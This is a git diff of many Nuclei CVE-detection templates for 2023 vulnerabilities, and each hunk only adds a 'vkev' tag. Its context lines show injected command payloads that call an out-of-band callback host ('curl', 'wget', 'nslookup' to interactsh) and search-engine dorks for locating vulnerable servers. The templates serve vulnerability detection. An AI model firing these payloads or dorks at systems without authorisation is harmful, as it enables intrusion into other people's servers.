--git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index b343dafd14a..9791a3a0154 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -25,7 +25,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress + tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 6f9409f35d0..296f0121544 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" public-www: /wp-content/plugins/wp-stats-manager/ - tags: time-based-sqli,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market + tags: time-based-sqli,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market,vkev variables: str: '{{rand_int(100000, 999999)}}' diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 4d66c5e9788..e3670ad9d85 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -37,7 +37,7 @@ info: - icon_hash=1484947000 - icon_hash=1484947000,1828756398,1170495932 zoomeye-query: app="fortra goanywhere-mft" - tags: cve2023,cve,rce,goanywhere,oast,kev,fortra + tags: cve2023,cve,rce,goanywhere,oast,kev,fortra,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-0876.yaml b/http/cves/2023/CVE-2023-0876.yaml index 5f848dedd82..9509b4f81d9 100644 --- a/http/cves/2023/CVE-2023-0876.yaml +++ b/http/cves/2023/CVE-2023-0876.yaml @@ -25,7 +25,7 @@ info: vendor: joomunited product: wp_meta_seo framework: wordpress - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect,vkev variables: link_endpoint: "{{rand_text_numeric(5)}}" diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 6d9d1dbdd68..f1e8cab122e 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -26,7 +26,7 @@ info: vendor: wp_live_chat_shoutbox_project product: wp_live_chat_shoutbox framework: wordpress - tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project + tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-1119.yaml b/http/cves/2023/CVE-2023-1119.yaml index e6fbc4a45dc..500aa5da1ad 100644 --- a/http/cves/2023/CVE-2023-1119.yaml +++ b/http/cves/2023/CVE-2023-1119.yaml @@ -24,7 +24,7 @@ info: vendor: wordpress product: wp-optimize,srbtranslatin fofa-query: body="/wp-content/plugins/wp-optimize" - tags: cve,cve2023,wp,wp-plugin,wordpress,wp-optimize,xss + tags: cve,cve2023,wp,wp-plugin,wordpress,wp-optimize,xss,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index c314ca3f099..074a2e92150 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -34,7 +34,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects + tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-1389.yaml b/http/cves/2023/CVE-2023-1389.yaml index 0ba640033e5..40f96b37d3f 100644 --- a/http/cves/2023/CVE-2023-1389.yaml +++ b/http/cves/2023/CVE-2023-1389.yaml @@ -26,7 +26,7 @@ info: fofa-query: body="tp-link" shodan-query: 'title:"TP-Link Router"' verified: true - tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev + tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index 53b306a0317..d7dc336b919 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml @@ -23,7 +23,7 @@ info: shodan-query: title:"Odoo" product: odoo vendor: odoo - tags: cve2023,cve,odoo,xss + tags: cve2023,cve,odoo,xss,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 278d2ce6884..b705df1ad4a 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -31,7 +31,7 @@ info: product: jeecg-boot shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 - tags: cve2023,cve,jeecg,sqli + tags: cve2023,cve,jeecg,sqli,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 8a1c482c37b..cce630dede0 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -38,7 +38,7 @@ info: - title="sophos web appliance" - icon_hash=-893681401 google-query: intitle:"sophos web appliance" - tags: cve2023,cve,packetstorm,rce,sophos,oast,kev + tags: cve2023,cve,packetstorm,rce,sophos,oast,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 3ea26d74a5b..1821ef0c434 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -32,7 +32,7 @@ info: - html:"/wbm/" html:"wago" - http.html:"/wbm/" html:"wago" fofa-query: body="/wbm/" html:"wago" - tags: cve2023,cve,wago,rce + tags: cve2023,cve,wago,rce,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 199ef27d3b4..b45865f97f0 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" - app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p" - tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive + tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive,vkev variables: html_comment: "" # Random string as HTML comment to append in response body diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml index 8f20c53e74d..523ba4f0710 100644 --- a/http/cves/2023/CVE-2023-20198.yaml +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -21,7 +21,7 @@ info: vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 - tags: cve,cve2023,cisco,rce,router,iot,network,kev + tags: cve,cve2023,cisco,rce,router,iot,network,kev,vkev variables: cmd: 'uname -a' diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index c9fe35aae2f..c18f7d4419b 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -30,7 +30,7 @@ info: - app="DedeCMS" - app="dedecms" - body="dedecms" - tags: cve,cve2023,dedecms,lfi + tags: cve,cve2023,dedecms,lfi,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 2b76e8866d7..57379b47639 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"vmware aria operations" - intitle:"vmware vrealize network insight" - tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev + tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev,vkev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 5520dd71e0c..bf4285b7848 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -34,7 +34,7 @@ info: fofa-query: - "kubepi" - body="kubepi" - tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud + tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud,vkev variables: name: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index f9573e4103d..4fbc599d262 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -35,7 +35,7 @@ info: fofa-query: - "kubepi" - body="kubepi" - tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud + tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 01b4fc29953..6c775449731 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="ATLASSIAN-Confluence" - app="atlassian-confluence" - tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian + tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian,vkev variables: username: "{{rand_base(10)}}" password: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 4cdd7ad7a7f..e5755a857a8 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -31,7 +31,7 @@ info: - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. - tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev + tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 67e317c31bd..f84e4bbadc9 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -29,7 +29,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian + tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index 2a2c9583454..df823bb6413 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -33,7 +33,7 @@ info: - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" - tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint + tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-22893.yaml b/http/cves/2023/CVE-2023-22893.yaml index d7d7dc561cc..9b97b646984 100644 --- a/http/cves/2023/CVE-2023-22893.yaml +++ b/http/cves/2023/CVE-2023-22893.yaml @@ -25,7 +25,7 @@ info: vendor: strapi product: strapi fofa-query: app="strapi-Headless-CMS" - tags: cve,cve2023,strapi,authenticated,aws,cognito + tags: cve,cve2023,strapi,authenticated,aws,cognito,vkev variables: email: "{{email}}" diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 3cee5f4d51f..ea2cbe61696 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -34,7 +34,7 @@ info: - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" - tags: cve,cve2023,securepoint,utm,exposure,memory + tags: cve,cve2023,securepoint,utm,exposure,memory,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-22952.yaml b/http/cves/2023/CVE-2023-22952.yaml index 1f139d4c396..022d0daedf7 100644 --- a/http/cves/2023/CVE-2023-22952.yaml +++ b/http/cves/2023/CVE-2023-22952.yaml @@ -31,7 +31,7 @@ info: - intext:"sugarcrm inc. all rights reserved" - intitle:"sugar setup wizard" - intitle:sugarcrm - tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev + tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev,vkev flow: http(1) && http(2) && http(3) diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index c81578156de..b85551b82eb 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -39,7 +39,7 @@ info: - body="solarview compact" && title="top" - icon_hash="-244067125" - body="solarview compact" - tags: cve,cve2023,packetstorm,solarview,rce,contec + tags: cve,cve2023,packetstorm,solarview,rce,contec,vkev variables: cmd: "echo+CVE-2023-23333|rev" diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 9d8c074bdea..b6e99e41f1e 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: time-based-sqli,cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios + tags: time-based-sqli,cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index 8fc0077d2c3..61020839e01 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -30,7 +30,7 @@ info: vendor: sandhillsdev product: easy_digital_downloads framework: wordpress - tags: time-based-sqli,cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev + tags: time-based-sqli,cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 28c0ecb5087..a1ec140e559 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -33,7 +33,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve,cve2023,joomla,kev + tags: cve,cve2023,joomla,kev,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index d6c71741fc5..30df2caad5f 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -33,7 +33,7 @@ info: - http.title:"citrix gateway" fofa-query: title="citrix gateway" google-query: intitle:"citrix gateway" - tags: cve2023,cve,citrix,xss,adc + tags: cve2023,cve,citrix,xss,adc,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 906102c2ca4..2a3012d9267 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -34,7 +34,7 @@ info: - http.title:"sharefile storage server" fofa-query: title="sharefile storage server" google-query: intitle:"sharefile storage server" - tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix + tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix,vkev variables: fileName: '{{rand_base(8)}}' diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 087868c219a..5b9f46e0955 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="pmb group" - icon_hash=1469328760 - tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb + tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index e430abb431b..b5fd1ee5ca6 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -41,7 +41,7 @@ info: - intext:"Powered By vBulletin" - intitle:"powered by vbulletin" - intext:"powered by vbulletin" - tags: cve,cve2023,vbulletin,rce + tags: cve,cve2023,vbulletin,rce,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index d7bda0ff152..fd82e9bc9e5 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -36,7 +36,7 @@ info: - title="geoserver" - app="geoserver" google-query: intitle:"geoserver" - tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo + tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index 55b08682fa0..5870c9611a5 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -29,7 +29,7 @@ info: - html:"Apache Druid" - http.html:"apache druid" fofa-query: body="apache druid" - tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-25280.yaml b/http/cves/2023/CVE-2023-25280.yaml index e01fadff832..aa2de2d75b3 100644 --- a/http/cves/2023/CVE-2023-25280.yaml +++ b/http/cves/2023/CVE-2023-25280.yaml @@ -20,7 +20,7 @@ info: metadata: vendor: dlink product: dir820la1_firmware - tags: cve,cve2023,rce,unauth,kev,dlink + tags: cve,cve2023,rce,unauth,kev,dlink,vkev variables: payload: "wget http://{{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index a262544cc83..d3ad24a6403 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -33,7 +33,7 @@ info: - body="Metersphere" - body="metersphere" - title="metersphere" - tags: cve,cve2023,metersphere,lfi + tags: cve,cve2023,metersphere,lfi,vkev variables: str: "{{rand_base(4)}}" rand: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index c3a0db885a7..8b956966c61 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -32,7 +32,7 @@ info: - http.title:"ruckus wireless" fofa-query: title="ruckus wireless" google-query: intitle:"ruckus wireless" - tags: cve2023,cve,ruckus,rce,kev,ruckuswireless + tags: cve2023,cve,ruckus,rce,kev,ruckuswireless,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index adfe078183d..fc66c19afd0 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -32,7 +32,7 @@ info: shodan-query: - "Server: Lexmark_Web_Server" - "server: lexmark_web_server" - tags: cve2023,cve,printer,iot,lexmark + tags: cve2023,cve,printer,iot,lexmark,vkev variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 8442f4c02bf..d7a239dcf48 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -34,7 +34,7 @@ info: - http.title:jira fofa-query: title=jira google-query: intitle:jira - tags: cve2023,cve,lfi,jira,cms,atlassian,stagil + tags: cve2023,cve,lfi,jira,cms,atlassian,stagil,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 0cca2de034d..fdbb136ded2 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -34,7 +34,7 @@ info: - http.title:jira fofa-query: title=jira google-query: intitle:jira - tags: cve,cve2023,lfi,jira,cms,atlassian,stagil + tags: cve,cve2023,lfi,jira,cms,atlassian,stagil,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-26258.yaml b/http/cves/2023/CVE-2023-26258.yaml index 794443a9adf..3aef2e6dc39 100644 --- a/http/cves/2023/CVE-2023-26258.yaml +++ b/http/cves/2023/CVE-2023-26258.yaml @@ -23,7 +23,7 @@ info: vendor: arcserve product: udp shodan-query: http.favicon.hash:-1889244460 - tags: cve,cve2023,arcserve,auth-bypass + tags: cve,cve2023,arcserve,auth-bypass,vkev flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index 8452e5143f1..5e56237c480 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -34,7 +34,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,adobe,coldfusion,auth-bypass + tags: cve2023,cve,adobe,coldfusion,auth-bypass,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index e55f429f57b..04693dd32b9 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -38,7 +38,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev + tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index a2594e86269..cb1d2f90f3f 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -31,7 +31,7 @@ info: product: jorani shodan-query: http.favicon.hash:-2032163853 fofa-query: icon_hash=-2032163853 - tags: cve2023,cve,jorani,rce,packetstorm + tags: cve2023,cve,jorani,rce,packetstorm,vkev variables: payload: "" header: "{{to_upper(rand_base(12))}}" diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 2824a8489a1..88970ec321d 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="泛微-EOffice" - app="泛微-eoffice" - tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive + tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive,vkev variables: file: '{{rand_base(5, "abc")}}' string: "CVE-2023-2648" diff --git a/http/cves/2023/CVE-2023-26802.yaml b/http/cves/2023/CVE-2023-26802.yaml index d5710e481a8..90df3942a3e 100644 --- a/http/cves/2023/CVE-2023-26802.yaml +++ b/http/cves/2023/CVE-2023-26802.yaml @@ -19,7 +19,7 @@ info: metadata: vendor: dcnglobal product: dcbi-netlog-lab_firmware - tags: cve,cve2023,rce,unauth,netlog + tags: cve,cve2023,rce,unauth,netlog,vkev variables: file_name: "{{rand_text_alpha(4)}}.html" diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 234a881f4ae..1d62670932a 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -29,7 +29,7 @@ info: vendor: joommasters product: jms_blog framework: prestashop - tags: time-based-sqli,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters + tags: time-based-sqli,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters,vkev flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index e0e8386bb1f..6cbc238696e 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -37,7 +37,7 @@ info: - icon_hash=-633108100 - title="sign in - appwrite" google-query: intitle:"sign in - appwrite" - tags: cve2023,cve,appwrite,ssrf,oast + tags: cve2023,cve,appwrite,ssrf,oast,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index a13c6268442..f0ba2e02ae7 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -33,7 +33,7 @@ info: publicwww-query: /wp-content/plugins/mstore-api/ shodan-query: http.html:/wp-content/plugins/mstore-api/ fofa-query: body=/wp-content/plugins/mstore-api/ - tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 991c7e77150..3a300eb7792 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -37,7 +37,7 @@ info: fofa-query: - body="papercut" - body="content=\"papercut\"" - tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev + tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev,vkev variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 4b045462aa7..5a26d4544b6 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -33,7 +33,7 @@ info: - http.html:"spip.php?page=backend" - cpe:"cpe:2.3:a:spip:spip" fofa-query: body="spip.php?page=backend" - tags: cve,cve2023,packetstorm,spip,rce + tags: cve,cve2023,packetstorm,spip,rce,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index 6be9b58b6fd..2bd6588b952 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -36,7 +36,7 @@ info: - cpe:"cpe:2.3:a:home-assistant:home-assistant" fofa-query: title="home assistant" google-query: intitle:"home assistant" - tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant + tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index eb058b86299..a260a3e3e1a 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="apache superset" - icon_hash=1582430156 - tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev + tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 122fd4bbd9b..f47b7c2c529 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: readtomyshoe_project product: readtomyshoe - tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project + tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-27637.yaml b/http/cves/2023/CVE-2023-27637.yaml index 91832bab20a..228a104a497 100644 --- a/http/cves/2023/CVE-2023-27637.yaml +++ b/http/cves/2023/CVE-2023-27637.yaml @@ -27,7 +27,7 @@ info: product: custom_product_designer framework: prestashop fofa-query: body="Prestashop" && body="tshirtecommerce" - tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli + tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-27638.yaml b/http/cves/2023/CVE-2023-27638.yaml index cc3c286e93a..239b9272d15 100644 --- a/http/cves/2023/CVE-2023-27638.yaml +++ b/http/cves/2023/CVE-2023-27638.yaml @@ -23,7 +23,7 @@ info: vendor: tshirtecommerce product: prestashop fofa-query: body="Prestashop" && body="tshirtecommerce" - tags: 